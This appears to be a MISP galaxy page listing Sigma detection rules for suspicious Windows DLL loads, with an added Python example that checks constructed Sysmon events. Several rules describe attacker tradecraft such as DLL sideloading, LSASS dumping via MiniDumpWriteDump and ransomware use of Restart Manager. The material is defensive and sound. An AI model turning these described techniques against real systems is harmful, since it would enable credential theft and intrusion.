  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9537. Table References

Links

https://hijacklibs.net/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_dbgcore_dll.yml

Amsi.DLL Loaded Via LOLBIN Process

Detects loading of "amsi.dll" by a living-off-the-land binary (LOLBIN). This could be an indication of a "PowerShell without PowerShell" attack.

The tag is: misp-galaxy:sigma-rules="Amsi.DLL Loaded Via LOLBIN Process"

Table 9538. Table References

Links

https://www.paloaltonetworks.com/blog/security-operations/stopping-powershell-without-powershell/

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_amsi_suspicious_process.yml

Potential AVKkid.DLL Sideloading

Detects potential DLL sideloading of "AVKkid.dll"

The tag is: misp-galaxy:sigma-rules="Potential AVKkid.DLL Sideloading"

Potential AVKkid.DLL Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9539. Table References

Links

https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_avkkid.yml

Potential DLL Sideloading Via JsSchHlp

Detects potential DLL sideloading using the JsSchHlp component of the JUSTSYSTEMS Japanese word processor.

The tag is: misp-galaxy:sigma-rules="Potential DLL Sideloading Via JsSchHlp"

Potential DLL Sideloading Via JsSchHlp has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9540. Table References

Links

https://www.welivesecurity.com/2022/12/14/unmasking-mirrorface-operation-liberalface-targeting-japanese-political-entities/

http://www.windowexe.com/bbs/board.php?q=jsschhlp-exe-c-program-files-common-files-justsystem-jsschhlp-jsschhlp

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_jsschhlp.yml

System Control Panel Item Loaded From Uncommon Location

Detects image load events of system control panel items (.cpl) from uncommon or non-system locations which might be the result of sideloading.

The tag is: misp-galaxy:sigma-rules="System Control Panel Item Loaded From Uncommon Location"

System Control Panel Item Loaded From Uncommon Location has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 9541. Table References

Links

https://www.hexacorn.com/blog/2024/01/01/1-little-known-secret-of-hdwwiz-exe/

https://www.hexacorn.com/blog/2024/01/06/1-little-known-secret-of-fondue-exe/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_cpl_from_non_system_location.yml

Potential DLL Sideloading Using Coregen.exe

Detects usage of the "coregen.exe" binary (Microsoft CoreCLR Native Image Generator) to sideload arbitrary DLLs.

The tag is: misp-galaxy:sigma-rules="Potential DLL Sideloading Using Coregen.exe"

Potential DLL Sideloading Using Coregen.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

Table 9542. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Coregen/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_coregen.yml

Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE

Detects exploitation of both CVE-2022-30190 (Follina) and DogWalk, which abuse the msdt.exe binary to load the "sdiageng.dll" library.

The tag is: misp-galaxy:sigma-rules="Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE"

Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 9543. Table References

Links

https://www.securonix.com/blog/detecting-microsoft-msdt-dogwalk/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_sdiageng_load_by_msdt.yml

Remote DLL Load Via Rundll32.EXE

Detects a remote DLL load event via "rundll32.exe".

The tag is: misp-galaxy:sigma-rules="Remote DLL Load Via Rundll32.EXE"

Remote DLL Load Via Rundll32.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

Table 9544. Table References

Links

https://github.com/gabe-k/themebleed

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_rundll32_remote_share_load.yml

VMMap Signed Dbghelp.DLL Potential Sideloading

Detects potential DLL sideloading of a signed dbghelp.dll by the Sysinternals VMMap tool.

The tag is: misp-galaxy:sigma-rules="VMMap Signed Dbghelp.DLL Potential Sideloading"

VMMap Signed Dbghelp.DLL Potential Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9545. Table References

Links

https://techcommunity.microsoft.com/t5/sysinternals-blog/zoomit-v7-1-procdump-2-0-for-linux-process-explorer-v17-05/ba-p/3884766

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_vmmap_dbghelp_signed.yml

Potential System DLL Sideloading From Non System Locations

Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.).

The tag is: misp-galaxy:sigma-rules="Potential System DLL Sideloading From Non System Locations"

Potential System DLL Sideloading From Non System Locations has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9546. Table References

Links

https://github.com/XForceIR/SideLoadHunter/blob/cc7ef2e5d8908279b0c4cee4e8b6f85f7b8eed52/SideLoads/README.md

https://blog.cyble.com/2022/07/21/qakbot-resurfaces-with-new-playbook/

https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/

https://hijacklibs.net/

https://www.hexacorn.com/blog/2023/12/26/1-little-known-secret-of-runonce-exe-32-bit/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_from_non_system_location.yml
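Several of the image-load entries on this page ("Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded", "WMIC Loading Scripting Libraries", the scrcons.exe ActiveScriptEventConsumer rule, "Unsigned DLL Loaded by RunDLL32/RegSvr32" and the system-DLL-from-non-system-location rule just above) reduce to predicates over the same Sysmon Event ID 7 record. The following is an added example written for this page, not the Sigma rules themselves or MISP code; field names follow the Sysmon schema (Image, ImageLoaded, Signed, SignatureStatus, ProcessId), while the watch-lists are deliberately short assumptions and the events are constructed.

```python
# Added example, not the Sigma rules or MISP code: several of the image-load rules
# on this page reduced to predicates over Sysmon Event ID 7 (Image loaded) records.
# Field names follow the Sysmon schema (Image, ImageLoaded, Signed, SignatureStatus,
# ProcessId); the watch-lists and the sample events are constructed for this example.
import ntpath

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\windows\\winsxs\\")
# DLLs that normally live in System32 and are popular sideloading targets (short, assumed
# list; the published rules use far longer lists drawn from hijacklibs.net).
SYSTEM_DLLS = {"dbghelp.dll", "dbgcore.dll", "comctl32.dll", "vssapi.dll", "version.dll"}
MINIDUMP_DLLS = {"dbghelp.dll", "dbgcore.dll"}       # both export MiniDumpWriteDump
SCRIPT_ENGINES = {"jscript.dll", "vbscript.dll"}     # pulled in when script runs in-process
SCRIPT_HOSTS = {"wmic.exe", "scrcons.exe"}           # wmic /FORMAT:<xsl>, ActiveScriptEventConsumer
PROXY_BINARIES = {"rundll32.exe", "regsvr32.exe"}


def _name(path: str) -> str:
    return ntpath.basename(path).lower()


def _directory(path: str) -> str:
    return ntpath.dirname(path).lower() + "\\"


def _signed(event: dict) -> bool:
    # Sysmon reports Signed as the strings "true"/"false"; require a valid chain as well.
    return event.get("Signed", "false").lower() == "true" and event.get("SignatureStatus") == "Valid"


def unsigned_minidump_dll(event: dict) -> bool:
    """A dump-capable DLL (dbghelp/dbgcore) loaded without a valid signature."""
    return _name(event["ImageLoaded"]) in MINIDUMP_DLLS and not _signed(event)


def script_host_loads_engine(event: dict) -> bool:
    """A script engine entering wmic.exe or scrcons.exe (XSL script / event consumer)."""
    return _name(event["Image"]) in SCRIPT_HOSTS and _name(event["ImageLoaded"]) in SCRIPT_ENGINES


def proxy_binary_loads_unsigned_dll(event: dict) -> bool:
    """rundll32.exe or regsvr32.exe loading a DLL that is not validly signed."""
    return _name(event["Image"]) in PROXY_BINARIES and not _signed(event)


def system_dll_from_non_system_dir(event: dict) -> bool:
    """A System32-resident DLL name loaded from somewhere else.  Signed copies legitimately
    shipped with applications match too, so treat this as a triage lead, not an alert."""
    return (_name(event["ImageLoaded"]) in SYSTEM_DLLS
            and not _directory(event["ImageLoaded"]).startswith(SYSTEM_DIRS))


RULES = {
    "unsigned_minidump_dll": unsigned_minidump_dll,
    "script_host_loads_engine": script_host_loads_engine,
    "proxy_binary_loads_unsigned_dll": proxy_binary_loads_unsigned_dll,
    "system_dll_from_non_system_dir": system_dll_from_non_system_dir,
}


def triage(events: list) -> dict:
    """Map each rule name to the ProcessIds of the events it matched."""
    hits = {name: [] for name in RULES}
    for event in events:
        for name, rule in RULES.items():
            if rule(event):
                hits[name].append(event["ProcessId"])
    return hits


def _event(pid: int, image: str, loaded: str, signed: str) -> dict:
    return {"ProcessId": pid, "Image": image, "ImageLoaded": loaded, "Signed": signed,
            "SignatureStatus": "Valid" if signed == "true" else "Unavailable"}


# Constructed Sysmon Event ID 7 records.
SAMPLE_EVENTS = [
    _event(1001, r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\dbghelp.dll", "true"),
    _event(1002, r"C:\Users\bob\AppData\Local\Temp\update.exe",
           r"C:\Users\bob\AppData\Local\Temp\dbghelp.dll", "false"),   # unsigned copy beside a dropper
    _event(1003, r"C:\Windows\System32\wbem\WMIC.exe", r"C:\Windows\System32\jscript.dll", "true"),
    _event(1004, r"C:\Windows\System32\rundll32.exe", r"C:\Users\Public\payload.dll", "false"),
    _event(1005, r"C:\Windows\System32\wbem\scrcons.exe", r"C:\Windows\System32\vbscript.dll", "true"),
    _event(1006, r"C:\Program Files\VMMap\vmmap.exe", r"C:\Program Files\VMMap\dbghelp.dll", "true"),
]

if __name__ == "__main__":
    for rule_name, pids in triage(SAMPLE_EVENTS).items():
        print(f"{rule_name}: {pids}")
```

Process 1006 illustrates the caveat in the last predicate: a signed dbghelp.dll shipped next to a legitimate tool (the VMMap entry above is exactly that case) trips the location check but not the signature check, so the two predicates are best combined or enriched with the loading process's own signature before alerting.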

Abusable DLL Potential Sideloading From Suspicious Location

Detects potential DLL sideloading of DLLs that are known to be abused from suspicious locations

The tag is: misp-galaxy:sigma-rules="Abusable DLL Potential Sideloading From Suspicious Location"

Abusable DLL Potential Sideloading From Suspicious Location has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 9547. Table References

Links

https://www.trendmicro.com/en_us/research/23/f/behind-the-scenes-unveiling-the-hidden-workings-of-earth-preta.html

https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_abused_dlls_susp_paths.yml

Suspicious Volume Shadow Copy VSS_PS.dll Load

Detects the image load of vss_ps.dll by uncommon executables

The tag is: misp-galaxy:sigma-rules="Suspicious Volume Shadow Copy VSS_PS.dll Load"

Suspicious Volume Shadow Copy VSS_PS.dll Load has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"

Table 9548. Table References

Links

https://www.virustotal.com/gui/file/ba88ca45589fae0139a40ca27738a8fc2dfbe1be5a64a9558f4e0f52b35c5add

https://twitter.com/am0nsec/status/1412232114980982787

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_vss_ps_susp_load.yml

Potential CCleanerDU.DLL Sideloading

Detects potential DLL sideloading of "CCleanerDU.dll"

The tag is: misp-galaxy:sigma-rules="Potential CCleanerDU.DLL Sideloading"

Potential CCleanerDU.DLL Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9549. Table References

Links

https://lab52.io/blog/2344-2/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_ccleaner_du.yml

Potential Azure Browser SSO Abuse

Detects abuse of Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account) who wants to perform SSO authentication in the browser. An attacker can use this to authenticate to Azure AD in a browser as that user.

The tag is: misp-galaxy:sigma-rules="Potential Azure Browser SSO Abuse"

Potential Azure Browser SSO Abuse has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9550. Table References

Links

https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_azure_microsoft_account_token_provider_dll_load.yml

Aruba Network Service Potential DLL Sideloading

Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking

The tag is: misp-galaxy:sigma-rules="Aruba Network Service Potential DLL Sideloading"

Aruba Network Service Potential DLL Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9551. Table References

Links

https://twitter.com/wdormann/status/1616581559892545537?t=XLCBO9BziGzD7Bmbt8oMEQ&s=09

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_aruba_networks_virtual_intranet_access.yml

Potential RjvPlatform.DLL Sideloading From Non-Default Location

Detects potential DLL sideloading of "RjvPlatform.dll" by "SystemResetPlatform.exe" located in a non-default location.

The tag is: misp-galaxy:sigma-rules="Potential RjvPlatform.DLL Sideloading From Non-Default Location"

Potential RjvPlatform.DLL Sideloading From Non-Default Location has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9552. Table References

Links

https://twitter.com/0gtweet/status/1666716511988330499

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_rjvplatform_non_default_location.yml

PowerShell Core DLL Loaded By Non PowerShell Process

Detects loading of essential DLLs used by PowerShell by a non-PowerShell process. Detects behavior similar to meterpreter’s "load powershell" extension.

The tag is: misp-galaxy:sigma-rules="PowerShell Core DLL Loaded By Non PowerShell Process"

PowerShell Core DLL Loaded By Non PowerShell Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9553. Table References

Links

https://adsecurity.org/?p=2921

https://github.com/p3nt4/PowerShdll

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_system_management_automation_susp_load.yml

Load Of RstrtMgr.DLL By An Uncommon Process

Detects the load of RstrtMgr DLL (Restart Manager) by an uncommon process. This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. It could also be used for anti-analysis purposes by shutting down specific processes.

The tag is: misp-galaxy:sigma-rules="Load Of RstrtMgr.DLL By An Uncommon Process"

Load Of RstrtMgr.DLL By An Uncommon Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9554. Table References

Links

https://www.crowdstrike.com/blog/windows-restart-manager-part-2/

https://taiwan.postsen.com/business/88601/Hamas-hackers-use-data-destruction-software-BiBi-which-consumes-a-lot-of-processor-resources-to-wipe-Windows-computer-data—​iThome.html

https://www.swascan.com/cactus-ransomware-malware-analysis/

https://www.crowdstrike.com/blog/windows-restart-manager-part-1/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_rstrtmgr_uncommon_load.yml

Potential Antivirus Software DLL Sideloading

Detects potential DLL sideloading of DLLs that are part of antivirus software such as McAfee, Symantec, etc.

The tag is: misp-galaxy:sigma-rules="Potential Antivirus Software DLL Sideloading"

Potential Antivirus Software DLL Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9555. Table References

Links

https://hijacklibs.net/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_antivirus.yml

DotNET Assembly DLL Loaded Via Office Application

Detects any assembly DLL being loaded by an Office Product

The tag is: misp-galaxy:sigma-rules="DotNET Assembly DLL Loaded Via Office Application"

DotNET Assembly DLL Loaded Via Office Application has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

Table 9556. Table References

Links

https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_office_dotnet_assembly_dll_load.yml

Third Party Software DLL Sideloading

Detects DLL sideloading of DLLs that are part of third party software (Zoom, Discord, etc.)

The tag is: misp-galaxy:sigma-rules="Third Party Software DLL Sideloading"

Third Party Software DLL Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9557. Table References

Links

https://hijacklibs.net/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_third_party.yml

Microsoft Excel Add-In Loaded From Uncommon Location

Detects Microsoft Excel loading an Add-In (.xll) file from an uncommon location

The tag is: misp-galaxy:sigma-rules="Microsoft Excel Add-In Loaded From Uncommon Location"

Microsoft Excel Add-In Loaded From Uncommon Location has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

Table 9558. Table References

Links

https://wazuh.com/blog/detecting-xll-files-used-for-dropping-fin7-jssloader-with-wazuh/

https://www.mandiant.com/resources/blog/lnk-between-browsers

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_office_excel_xll_susp_load.yml

Load Of RstrtMgr.DLL By A Suspicious Process

Detects the load of RstrtMgr DLL (Restart Manager) by a suspicious process. This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. It could also be used for anti-analysis purposes by shutting down specific processes.

The tag is: misp-galaxy:sigma-rules="Load Of RstrtMgr.DLL By A Suspicious Process"

Load Of RstrtMgr.DLL By A Suspicious Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9559. Table References

Links

https://www.crowdstrike.com/blog/windows-restart-manager-part-2/

https://taiwan.postsen.com/business/88601/Hamas-hackers-use-data-destruction-software-BiBi-which-consumes-a-lot-of-processor-resources-to-wipe-Windows-computer-data—​iThome.html

https://www.swascan.com/cactus-ransomware-malware-analysis/

https://www.crowdstrike.com/blog/windows-restart-manager-part-1/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_rstrtmgr_suspicious_load.yml

Potential DLL Sideloading Via VMware Xfer

Detects loading of a DLL by the VMware Xfer utility from a non-default directory, which may be an attempt to sideload an arbitrary DLL

The tag is: misp-galaxy:sigma-rules="Potential DLL Sideloading Via VMware Xfer"

Potential DLL Sideloading Via VMware Xfer has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9560. Table References

Links

https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_vmware_xfer.yml

Potential Mfdetours.DLL Sideloading

Detects potential DLL sideloading of "mfdetours.dll". While using "mftrace.exe" it can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution.

The tag is: misp-galaxy:sigma-rules="Potential Mfdetours.DLL Sideloading"

Potential Mfdetours.DLL Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9561. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_mfdetours.yml

Python Image Load By Non-Python Process

Detects the image load of "Python Core" by a non-Python process. This might be indicative of a Python script bundled with Py2Exe.

The tag is: misp-galaxy:sigma-rules="Python Image Load By Non-Python Process"

Python Image Load By Non-Python Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"

Table 9562. Table References

Links

https://www.py2exe.org/

https://unit42.paloaltonetworks.com/unit-42-technical-analysis-seaduke/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_python_image_load.yml

Potential DCOM InternetExplorer.Application DLL Hijack - Image Load

Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class

The tag is: misp-galaxy:sigma-rules="Potential DCOM InternetExplorer.Application DLL Hijack - Image Load"

Potential DCOM InternetExplorer.Application DLL Hijack - Image Load has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Distributed Component Object Model - T1021.003" with estimative-language:likelihood-probability="almost-certain"

Table 9563. Table References

Links

https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_iexplore_dcom_iertutil_dll_hijack.yml

Suspicious Unsigned Thor Scanner Execution

Detects loading and execution of an unsigned thor scanner binary.

The tag is: misp-galaxy:sigma-rules="Suspicious Unsigned Thor Scanner Execution"

Suspicious Unsigned Thor Scanner Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9564. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_thor_unsigned_execution.yml

Unsigned Image Loaded Into LSASS Process

Detects an unsigned image (DLL, EXE) being loaded into the LSASS process

The tag is: misp-galaxy:sigma-rules="Unsigned Image Loaded Into LSASS Process"

Unsigned Image Loaded Into LSASS Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 9565. Table References

Links

https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_lsass_unsigned_image_load.yml

Potential Waveedit.DLL Sideloading

Detects potential DLL sideloading of "waveedit.dll", which is part of the Nero WaveEditor audio editing software.

The tag is: misp-galaxy:sigma-rules="Potential Waveedit.DLL Sideloading"

Potential Waveedit.DLL Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9566. Table References

Links

https://www.trendmicro.com/en_us/research/23/f/behind-the-scenes-unveiling-the-hidden-workings-of-earth-preta.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_waveedit.yml

DotNet CLR DLL Loaded By Scripting Applications

Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.

The tag is: misp-galaxy:sigma-rules="DotNet CLR DLL Loaded By Scripting Applications"

DotNet CLR DLL Loaded By Scripting Applications has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

Table 9567. Table References

Links

https://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008

https://github.com/tyranid/DotNetToJScript

https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html

https://thewover.github.io/Introducing-Donut/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml

VMMap Unsigned Dbghelp.DLL Potential Sideloading

Detects potential DLL sideloading of an unsigned dbghelp.dll by the Sysinternals VMMap.

The tag is: misp-galaxy:sigma-rules="VMMap Unsigned Dbghelp.DLL Potential Sideloading"

VMMap Unsigned Dbghelp.DLL Potential Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9568. Table References

Links

https://techcommunity.microsoft.com/t5/sysinternals-blog/zoomit-v7-1-procdump-2-0-for-linux-process-explorer-v17-05/ba-p/3884766

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_vmmap_dbghelp_unsigned.yml

Potential CCleanerReactivator.DLL Sideloading

Detects potential DLL sideloading of "CCleanerReactivator.dll"

The tag is: misp-galaxy:sigma-rules="Potential CCleanerReactivator.DLL Sideloading"

Potential CCleanerReactivator.DLL Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9569. Table References

Links

https://lab52.io/blog/2344-2/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_ccleaner_reactivator.yml

Load Of Dbghelp/Dbgcore DLL From Suspicious Process

Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes. Tools like ProcessHacker and some attacker tradecraft use the MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll. As an example, the SILENTTRINITY C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker’s machine.

The tag is: misp-galaxy:sigma-rules="Load Of Dbghelp/Dbgcore DLL From Suspicious Process"

Load Of Dbghelp/Dbgcore DLL From Suspicious Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 9570. Table References

Links

https://www.pinvoke.net/default.aspx/dbghelp/MiniDumpWriteDump.html

https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6

https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_dbghelp_dbgcore_susp_load.yml

Potential WWlib.DLL Sideloading

Detects potential DLL sideloading of "wwlib.dll"

The tag is: misp-galaxy:sigma-rules="Potential WWlib.DLL Sideloading"

Potential WWlib.DLL Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9571. Table References

Links

https://twitter.com/WhichbufferArda/status/1658829954182774784

